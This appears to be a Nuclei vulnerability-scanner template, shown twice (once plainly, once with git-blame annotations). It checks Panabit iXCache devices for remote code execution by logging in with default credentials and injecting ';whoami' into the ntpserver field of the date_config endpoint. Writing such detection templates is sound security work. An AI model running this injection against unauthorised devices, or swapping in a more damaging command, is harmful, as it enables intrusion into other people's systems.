nuclei-templates/http/vulnerabilities/other/panabit-ixcache-rce.yaml

id: panabit-ixcache-rce

info:
  name: Panabit iXCache date_config - Remote Code Execution
  author: momika233
  severity: critical
  description: |
    Panabit iXCache date_config module has command splicing, resulting in the execution of arbitrary commands.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Panabit%20iXCache%20date_config%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/Panabit/Panabit%20iXCache%20date_config%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  metadata:
    max-request: 2
    fofa-qeury: title="iXCache"
    veified: true
  tags: panabit,rce,ixcache,intrusive

http:
  - raw:
      - |
        POST /login/userverify.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        POST /cgi-bin/Maintain/date_config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ntpserver=0.0.0.0;whoami&year=2021&month=08&day=14&hour=17&minute=04&second=50&tz=Asiz&bcy=Shanghai&ifname=fxp1

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - ixcache

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 490a00463044022024072ca794b49ade9923364f3c2f68bb283731b236da8f9b34c7f51be09a15680220720bf1c56c1cda865a6f69a512166c70d0ee85f0c43e75eaf4b2fb1ac5a1d6f6:922c64590222798bb761d5b6d8e72950
re-wrote template 2023-08-08 21:02:42 +00:00			`id: panabit-ixcache-rce`

Add files via upload 2023-08-08 19:54:06 +00:00			`info:`
re-wrote template 2023-08-08 21:02:42 +00:00			`name: Panabit iXCache date_config - Remote Code Execution`
Add files via upload 2023-08-08 19:54:06 +00:00			`author: momika233`
			`severity: critical`
re-wrote template 2023-08-08 21:02:42 +00:00			`description: \|`
			`Panabit iXCache date_config module has command splicing, resulting in the execution of arbitrary commands.`
			`reference:`
			`- https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Panabit%20iXCache%20date_config%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md`
			`- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/Panabit/Panabit%20iXCache%20date_config%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md`
Add files via upload 2023-08-08 19:54:06 +00:00			`metadata:`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 2`
Add files via upload 2023-08-08 19:54:06 +00:00			`fofa-qeury: title="iXCache"`
			`veified: true`
tag - update 2023-08-10 05:50:30 +00:00			`tags: panabit,rce,ixcache,intrusive`
re-wrote template 2023-08-08 21:02:42 +00:00
Add files via upload 2023-08-08 19:54:06 +00:00			`http:`
			`- raw:`
			`- \|`
			`POST /login/userverify.cgi HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
re-wrote template 2023-08-08 21:02:42 +00:00
Add files via upload 2023-08-08 19:54:06 +00:00			`username={{username}}&password={{password}}`
			`- \|`
			`POST /cgi-bin/Maintain/date_config HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
re-wrote template 2023-08-08 21:02:42 +00:00
Add files via upload 2023-08-08 19:54:06 +00:00			`ntpserver=0.0.0.0;whoami&year=2021&month=08&day=14&hour=17&minute=04&second=50&tz=Asiz&bcy=Shanghai&ifname=fxp1`
re-wrote template 2023-08-08 21:02:42 +00:00
Add files via upload 2023-08-08 19:54:06 +00:00			`attack: pitchfork`
			`payloads:`
			`username:`
			`- admin`
			`password:`
			`- ixcache`
re-wrote template 2023-08-08 21:02:42 +00:00
Add files via upload 2023-08-08 19:54:06 +00:00			`matchers-condition: and`
			`matchers:`
re-wrote template 2023-08-08 21:02:42 +00:00			`- type: regex`
move directory and minor fix 2023-08-08 21:35:32 +00:00			`part: body`
re-wrote template 2023-08-08 21:02:42 +00:00			`regex:`
move directory and minor fix 2023-08-08 21:35:32 +00:00			`- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"`

			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`
re-wrote template 2023-08-08 21:02:42 +00:00
Add files via upload 2023-08-08 19:54:06 +00:00			`- type: status`
			`status:`
fix trail space 2023-08-08 21:06:12 +00:00			`- 200`
TemplateMan Update [Mon Nov 27 09:19:41 UTC 2023] :robot: 2023-11-27 09:19:41 +00:00
			`# digest: 490a00463044022024072ca794b49ade9923364f3c2f68bb283731b236da8f9b34c7f51be09a15680220720bf1c56c1cda865a6f69a512166c70d0ee85f0c43e75eaf4b2fb1ac5a1d6f6:922c64590222798bb761d5b6d8e72950`